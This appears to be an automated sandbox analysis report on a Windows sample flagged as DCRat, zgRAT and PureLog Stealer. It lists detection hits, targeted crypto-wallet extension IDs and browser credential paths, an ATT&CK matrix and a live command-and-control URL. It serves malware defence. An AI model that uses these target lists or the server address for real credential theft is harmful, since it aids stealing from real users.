                                  Source: Yara matchFile source: 00000000.00000003.1643679277.00000000068D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000004.00000000.1762447136.0000000000572000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\MsContainer\chainportruntimeCrtMonitor.exe, type: DROPPED
                                  Yara detected zgRAT
                                  Source: Yara matchFile source: file.exe, type: SAMPLE
                                  Source: Yara matchFile source: 0.3.file.exe.69276f8.0.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.3.file.exe.52886f8.1.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.3.file.exe.52886f8.1.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 4.0.chainportruntimeCrtMonitor.exe.570000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.3.file.exe.69276f8.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\MsContainer\chainportruntimeCrtMonitor.exe, type: DROPPED
                                  Found many strings related to Crypto-Wallets (likely being stolen)
                                  Source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2910935301.0000000003529000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Electrum
                                  Source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2910935301.0000000003529000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Electrum\wallets\
                                  Source: chainportruntimeCrtMonitor.exe, 00000004.00000002.1797177505.0000000002BC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: {"0":[],"2a025748-b498-4ae9-8f8c-b763dd8b5ffc":{"_0":"Smart","_1":"False","_2":"False","_3":"False"},"31395ecd-4eed-48b9-a47f-81dbcc84ccdf":{"_0":"True","_1":"nkbihfbeogaeaoehlefnkodbefgpgknn:MetaMask\nejbalbakoplchlghecdalmeeeajnimhm:MetaMask\nibnejdfjmmkpcnlpebklmnkoeoihofec:TronLink\nfnjhmkhhmkbjkkabndcnnogagogbneec:Ronin\nkjmoohlgokccodicjjfebfomlbljgfhk:Ronin\nfhbohimaelbohpjbbldcngcnapndodjp:BinanceChain\nbfnaelmomeimhlpmgjnjophhpkkoljpa:Phantom\nnphplpgoakhhjchkkhmiggakijnkhfnd:TONWeb\nffnbelfdoeiohenkjibnmadjiehjhajb:Yoroi\nakoiaibnepcedcplijmiamnaigbepmcb:Yoroi\nafbcbjpbpfadlkmhmclhkeeodmamcflc:MathWallet\nhnfanknocfeofbddgcijnmhnfnkdnaad:Coinbase\nimloifkgjagghnncjkhggdhalmcnfklk:TrezorPM\nilgcnhelpchnceeipipijaljkblbcobl:GAuth\noeljdldpnmdbchonielidgobddffflal:EOS\ncjelfplplebdjjenllpjcblmjkfcffne:JaxxLiberty\nlgmpcpglpngdoalbgeoldeajfclnhafa:SafePal\naholpfdialjgjfhomihkjbmgjidlcdno:Exodus","_2":"All Users","_3":"True"},"ff275d84-13f9-47b8-9de6-a3dfeab3ea1e":{"_0":"Builds","_1":""}}
                                  Source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2910935301.0000000003529000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Exodus\exodus.wallet\
                                  Source: chainportruntimeCrtMonitor.exe, 00000004.00000002.1797177505.0000000002BC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: {"0":[],"2a025748-b498-4ae9-8f8c-b763dd8b5ffc":{"_0":"Smart","_1":"False","_2":"False","_3":"False"},"31395ecd-4eed-48b9-a47f-81dbcc84ccdf":{"_0":"True","_1":"nkbihfbeogaeaoehlefnkodbefgpgknn:MetaMask\nejbalbakoplchlghecdalmeeeajnimhm:MetaMask\nibnejdfjmmkpcnlpebklmnkoeoihofec:TronLink\nfnjhmkhhmkbjkkabndcnnogagogbneec:Ronin\nkjmoohlgokccodicjjfebfomlbljgfhk:Ronin\nfhbohimaelbohpjbbldcngcnapndodjp:BinanceChain\nbfnaelmomeimhlpmgjnjophhpkkoljpa:Phantom\nnphplpgoakhhjchkkhmiggakijnkhfnd:TONWeb\nffnbelfdoeiohenkjibnmadjiehjhajb:Yoroi\nakoiaibnepcedcplijmiamnaigbepmcb:Yoroi\nafbcbjpbpfadlkmhmclhkeeodmamcflc:MathWallet\nhnfanknocfeofbddgcijnmhnfnkdnaad:Coinbase\nimloifkgjagghnncjkhggdhalmcnfklk:TrezorPM\nilgcnhelpchnceeipipijaljkblbcobl:GAuth\noeljdldpnmdbchonielidgobddffflal:EOS\ncjelfplplebdjjenllpjcblmjkfcffne:JaxxLiberty\nlgmpcpglpngdoalbgeoldeajfclnhafa:SafePal\naholpfdialjgjfhomihkjbmgjidlcdno:Exodus","_2":"All Users","_3":"True"},"ff275d84-13f9-47b8-9de6-a3dfeab3ea1e":{"_0":"Builds","_1":""}}
                                  Source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2910935301.0000000003529000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Coinomi\Coinomi\wallets\
                                  Source: kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2910935301.0000000003529000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Exodus\exodus.wallet\
                                  Source: file.exe, 00000000.00000003.1644868327.000000000523A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: set_UseMachineKeyStore
                                  Tries to harvest and steal browser information (history, passwords, etc)
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shmJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journalJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-walJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior

                                  Remote Access Functionality

                                  barindex
                                  Yara detected DCRat
                                  Source: Yara matchFile source: 0000000E.00000002.2910935301.0000000003B02000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000000E.00000002.2910935301.000000000384A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000004.00000002.1801521334.0000000012BCD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000000E.00000002.2910935301.0000000003529000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: chainportruntimeCrtMonitor.exe PID: 7876, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: kahKUDRlEYHfKIalWlM.exe PID: 7244, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: kahKUDRlEYHfKIalWlM.exe PID: 7264, type: MEMORYSTR
                                  Yara detected PureLog Stealer
                                  Source: Yara matchFile source: file.exe, type: SAMPLE
                                  Source: Yara matchFile source: 0.3.file.exe.69276f8.0.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.3.file.exe.52886f8.1.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.3.file.exe.52886f8.1.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 4.0.chainportruntimeCrtMonitor.exe.570000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.3.file.exe.69276f8.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000000.00000003.1644868327.000000000523A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000000.00000003.1643679277.00000000068D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000004.00000000.1762447136.0000000000572000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\MsContainer\chainportruntimeCrtMonitor.exe, type: DROPPED
                                  Yara detected zgRAT
                                  Source: Yara matchFile source: file.exe, type: SAMPLE
                                  Source: Yara matchFile source: 0.3.file.exe.69276f8.0.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.3.file.exe.52886f8.1.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.3.file.exe.52886f8.1.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 4.0.chainportruntimeCrtMonitor.exe.570000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.3.file.exe.69276f8.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\MsContainer\chainportruntimeCrtMonitor.exe, type: DROPPED

                                  Mitre Att&ck Matrix

                                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                  Gather Victim Identity Information11
                                  Scripting                                  		Valid Accounts11
                                  Windows Management Instrumentation                                  		11
                                  Scripting                                  		1
                                  DLL Side-Loading                                  		11
                                  Disable or Modify Tools                                  		1
                                  OS Credential Dumping                                  		1
                                  System Time Discovery                                  		Remote Services11
                                  Archive Collected Data                                  		2
                                  Encrypted Channel                                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                                  CredentialsDomainsDefault Accounts1
                                  Exploitation for Client Execution                                  		1
                                  DLL Side-Loading                                  		12
                                  Process Injection                                  		11
                                  Deobfuscate/Decode Files or Information                                  		LSASS Memory3
                                  File and Directory Discovery                                  		Remote Desktop Protocol2
                                  Data from Local System                                  		1
                                  Non-Application Layer Protocol                                  		Exfiltration Over BluetoothNetwork Denial of Service
                                  Email AddressesDNS ServerDomain Accounts2
                                  Command and Scripting Interpreter                                  		Logon Script (Windows)Logon Script (Windows)4
                                  Obfuscated Files or Information                                  		Security Account Manager147
                                  System Information Discovery                                  		SMB/Windows Admin Shares1
                                  Clipboard Data                                  		11
                                  Application Layer Protocol                                  		Automated ExfiltrationData Encrypted for Impact
                                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
                                  Software Packing                                  		NTDS241
                                  Security Software Discovery                                  		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                                  DLL Side-Loading                                  		LSA Secrets2
                                  Process Discovery                                  		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
                                  Masquerading                                  		Cached Domain Credentials141
                                  Virtualization/Sandbox Evasion                                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items141
                                  Virtualization/Sandbox Evasion                                  		DCSync1
                                  Application Window Discovery                                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                                  Process Injection                                  		Proc Filesystem1
                                  Remote System Discovery                                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                                  System Network Configuration Discovery                                  		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                                  Behavior Graph

                                  Hide Legend

                                  Legend:

                                  • Process
                                  • Signature
                                  • Created File
                                  • DNS/IP Info
                                  • Is Dropped
                                  • Is Windows Process
                                  • Number of created Registry Values
                                  • Number of created Files
                                  • Visual Basic
                                  • Delphi
                                  • Java
                                  • .Net C# or VB.NET
                                  • C, C++ or other language
                                  • Is malicious
                                  • Internet
                                  behaviorgraph top1 signatures2 2 Behavior Graph ID: 1569008 Sample: file.exe Startdate: 05/12/2024 Architecture: WINDOWS Score: 100 79 Suricata IDS alerts for network traffic 2->79 81 Found malware configuration 2->81 83 Antivirus detection for URL or domain 2->83 85 12 other signatures 2->85 10 file.exe 3 6 2->10         started        14 kahKUDRlEYHfKIalWlM.exe 14 21 2->14         started        17 svchost.exe 2->17         started        19 kahKUDRlEYHfKIalWlM.exe 2->19         started        process3 dnsIp4 49 C:\...\chainportruntimeCrtMonitor.exe, PE32 10->49 dropped 51 C:\...\P69CZ8d7qXWcyOsB66pHSLt72y6yplqEAs.vbe, data 10->51 dropped 91 Found many strings related to Crypto-Wallets (likely being stolen) 10->91 21 wscript.exe 1 10->21         started        69 193.3.168.50, 49734, 49740, 49741 ARNES-NETAcademicandResearchNetworkofSloveniaSI Denmark 14->69 53 C:\Users\user\Desktop\vJIWLFOd.log, PE32 14->53 dropped 55 C:\Users\user\Desktop\pQfxiZJp.log, PE32 14->55 dropped 57 C:\Users\user\Desktop\jYCYFtEB.log, PE32 14->57 dropped 59 3 other malicious files 14->59 dropped 93 Antivirus detection for dropped file 14->93 95 Multi AV Scanner detection for dropped file 14->95 97 Machine Learning detection for dropped file 14->97 99 2 other signatures 14->99 71 127.0.0.1 unknown unknown 17->71 file5 signatures6 process7 signatures8 87 Windows Scripting host queries suspicious COM object (likely to drop second stage) 21->87 89 Suspicious execution chain found 21->89 24 cmd.exe 1 21->24         started        process9 process10 26 chainportruntimeCrtMonitor.exe 3 14 24->26         started        30 conhost.exe 24->30         started        file11 61 C:\Users\user\Desktop\vCAeICGo.log, PE32 26->61 dropped 63 C:\Users\user\Desktop\aEtIhTbg.log, PE32 26->63 dropped 65 C:\Users\user\Desktop\ZlAIxOci.log, PE32 26->65 dropped 67 5 other malicious files 26->67 dropped 101 Antivirus detection for dropped file 26->101 103 Multi AV Scanner detection for dropped file 26->103 105 Machine Learning detection for dropped file 26->105 107 3 other signatures 26->107 32 cmd.exe 1 26->32         started        35 powershell.exe 23 26->35         started        signatures12 process13 signatures14 73 Uses ping.exe to sleep 32->73 75 Uses ping.exe to check the status of other devices and networks 32->75 37 conhost.exe 32->37         started        39 PING.EXE 1 32->39         started        41 chcp.com 1 32->41         started        43 kahKUDRlEYHfKIalWlM.exe 32->43         started        77 Loading BitLocker PowerShell Module 35->77 45 conhost.exe 35->45         started        47 WmiPrvSE.exe 35->47         started        process15

                                  Screenshots

                                  Thumbnails

                                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                  windows-stand

                                  Antivirus, Machine Learning and Genetic Malware Detection

                                  Initial Sample

                                  SourceDetectionScannerLabelLink
                                  file.exe55%ReversingLabsByteCode-MSIL.Trojan.Uztuby
                                  file.exe100%AviraVBS/Runner.VPG
                                  file.exe100%Joe Sandbox ML

                                  Dropped Files

                                  SourceDetectionScannerLabelLink
                                  C:\MsContainer\chainportruntimeCrtMonitor.exe100%AviraHEUR/AGEN.1323342
                                  C:\Users\user\Desktop\GYwcCMoE.log100%AviraTR/AVI.Agent.updqb
                                  C:\MsContainer\P69CZ8d7qXWcyOsB66pHSLt72y6yplqEAs.vbe100%AviraVBS/Runner.VPG
                                  C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe100%AviraHEUR/AGEN.1323342
                                  C:\Users\user\Desktop\aEtIhTbg.log100%AviraTR/AVI.Agent.updqb
                                  C:\Users\user\AppData\Local\Temp\hlVW2PE0oG.bat100%AviraBAT/Delbat.C
                                  C:\Users\user\Desktop\YuXIhBvf.log100%Joe Sandbox ML
                                  C:\Users\user\Desktop\vCAeICGo.log100%Joe Sandbox ML
                                  C:\MsContainer\chainportruntimeCrtMonitor.exe100%Joe Sandbox ML
                                  C:\Users\user\Desktop\jYCYFtEB.log100%Joe Sandbox ML
                                  C:\Users\user\Desktop\WzsROUza.log100%Joe Sandbox ML
                                  C:\Users\user\Desktop\QRPSxHgy.log100%Joe Sandbox ML
                                  C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe100%Joe Sandbox ML
                                  C:\Users\user\Desktop\pQfxiZJp.log100%Joe Sandbox ML
                                  C:\MsContainer\chainportruntimeCrtMonitor.exe58%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                  C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe58%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                  C:\Users\user\Desktop\GYwcCMoE.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                  C:\Users\user\Desktop\HnGdNOQQ.log17%ReversingLabs
                                  C:\Users\user\Desktop\QRPSxHgy.log4%ReversingLabs
                                  C:\Users\user\Desktop\UFpBXUVk.log25%ReversingLabs
                                  C:\Users\user\Desktop\WzsROUza.log4%ReversingLabs
                                  C:\Users\user\Desktop\YuXIhBvf.log29%ReversingLabsWin32.Trojan.Generic
                                  C:\Users\user\Desktop\ZlAIxOci.log25%ReversingLabs
                                  C:\Users\user\Desktop\aEtIhTbg.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                  C:\Users\user\Desktop\jYCYFtEB.log16%ReversingLabs
                                  C:\Users\user\Desktop\pQfxiZJp.log29%ReversingLabsWin32.Trojan.Generic
                                  C:\Users\user\Desktop\vCAeICGo.log16%ReversingLabs
                                  C:\Users\user\Desktop\vJIWLFOd.log17%ReversingLabs

                                  Unpacked PE Files

                                  No Antivirus matches

                                  Domains

                                  No Antivirus matches

                                  URLs

                                  SourceDetectionScannerLabelLink
                                  https://.AppV.0%Avira URL Cloudsafe
                                  http://www.fontbureau.com/designers/?0%Avira URL Cloudsafe
                                  http://www.goodfont.co.kr0%Avira URL Cloudsafe
                                  http://www.fontbureau.com/designersG0%Avira URL Cloudsafe
                                  http://www.fontbureau.com/designers?0%Avira URL Cloudsafe
                                  http://www.tiro.com0%Avira URL Cloudsafe
                                  http://www.founder.com.cn/cn/bThe0%Avira URL Cloudsafe
                                  http://www.fontbureau.com/designers0%Avira URL Cloudsafe
                                  http://www.sajatypeworks.com0%Avira URL Cloudsafe
                                  http://www.typography.netD0%Avira URL Cloudsafe
                                  http://www.galapagosdesign.com/staff/dennis.htm0%Avira URL Cloudsafe
                                  http://www.galapagosdesign.com/DPlease0%Avira URL Cloudsafe
                                  http://www.founder.com.cn/cn/cThe0%Avira URL Cloudsafe
                                  http://www.sakkal.com0%Avira URL Cloudsafe
                                  http://www.urwpp.deDPlease0%Avira URL Cloudsafe
                                  http://www.fonts.com0%Avira URL Cloudsafe
                                  http://www.zhongyicts.com.cn0%Avira URL Cloudsafe
                                  http://www.sandoll.co.kr0%Avira URL Cloudsafe
                                  http://www.fontbureau.com0%Avira URL Cloudsafe
                                  http://193.3.168.500%Avira URL Cloudsafe
                                  http://crl.ver)0%Avira URL Cloudsafe
                                  http://193.3.168.50/privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalData0%Avira URL Cloudsafe
                                  http://www.fontbureau.com/designers/frere-user.html0%Avira URL Cloudsafe
                                  http://www.founder.com.cn/cn0%Avira URL Cloudsafe
                                  http://www.fontbureau.com/designers/cabarga.htmlN0%Avira URL Cloudsafe
                                  http://www.fontbureau.com/designers80%Avira URL Cloudsafe
                                  http://www.carterandcone.coml0%Avira URL Cloudsafe
                                  http://www.jiyu-kobo.co.jp/0%Avira URL Cloudsafe
                                  http://193.3.168.50/privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php100%Avira URL Cloudmalware

                                  Domains and IPs

                                  Contacted Domains

                                  No contacted domains info

                                  Contacted URLs

                                  NameMaliciousAntivirus DetectionReputation
                                  http://193.3.168.50/privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.phptrue
                                  • Avira URL Cloud: malware
                                  		unknown

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://duckduckgo.com/chrome_newtabkahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2931600594.000000001359F000.00000004.00000800.00020000.00000000.sdmp, kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2931600594.0000000013800000.00000004.00000800.00020000.00000000.sdmp, Um9wZYC743.14.dr, 19TzMtmWeK.14.drfalse
                                    		high
                                    http://www.fontbureau.com/designersGkahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://duckduckgo.com/ac/?q=kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2931600594.000000001359F000.00000004.00000800.00020000.00000000.sdmp, kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2931600594.0000000013800000.00000004.00000800.00020000.00000000.sdmp, Um9wZYC743.14.dr, 19TzMtmWeK.14.drfalse
                                      		high
                                      http://www.fontbureau.com/designers/?kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.founder.com.cn/cn/bThekahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.fontbureau.com/designers?kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.micom/pkiops/Docs/ry.htm0powershell.exe, 00000008.00000002.1829367283.000001D7001C9000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://contoso.com/Licensepowershell.exe, 00000008.00000002.1889874656.000001D777FD6000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.tiro.comkahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://.AppV.powershell.exe, 00000008.00000002.1831461508.000001D700585000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://g.live.com/odclientsettings/ProdV2.C:edb.log.18.dr, qmgr.db.18.drfalse
                                            		high
                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2931600594.000000001359F000.00000004.00000800.00020000.00000000.sdmp, kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2931600594.0000000013800000.00000004.00000800.00020000.00000000.sdmp, Um9wZYC743.14.dr, 19TzMtmWeK.14.drfalse
                                              		high
                                              http://www.fontbureau.com/designerskahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.goodfont.co.krkahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.sajatypeworks.comkahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.typography.netDkahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://g.live.com/odclientsettings/Prod.C:edb.log.18.dr, qmgr.db.18.drfalse
                                                		high
                                                http://www.founder.com.cn/cn/cThekahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.galapagosdesign.com/staff/dennis.htmkahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://g.live.com/odclientsettings/ProdV2edb.log.18.dr, qmgr.db.18.drfalse
                                                  		high
                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchkahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2931600594.000000001359F000.00000004.00000800.00020000.00000000.sdmp, kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2931600594.0000000013800000.00000004.00000800.00020000.00000000.sdmp, Um9wZYC743.14.dr, 19TzMtmWeK.14.drfalse
                                                    		high
                                                    https://contoso.com/powershell.exe, 00000008.00000002.1889874656.000001D777FD6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://nuget.org/nuget.exepowershell.exe, 00000008.00000002.1889874656.000001D777FD6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://www.galapagosdesign.com/DPleasekahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.fonts.comkahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.sandoll.co.krkahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.urwpp.deDPleasekahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.zhongyicts.com.cnkahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namechainportruntimeCrtMonitor.exe, 00000004.00000002.1797177505.0000000002E5B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1834436615.000001D767F61000.00000004.00000800.00020000.00000000.sdmp, kahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2910935301.0000000003529000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://www.sakkal.comkahKUDRlEYHfKIalWlM.exe, 0000000E.00000002.2946256522.000000001F032000.00000004.00000800.00020000.00000000.sdmpfalse
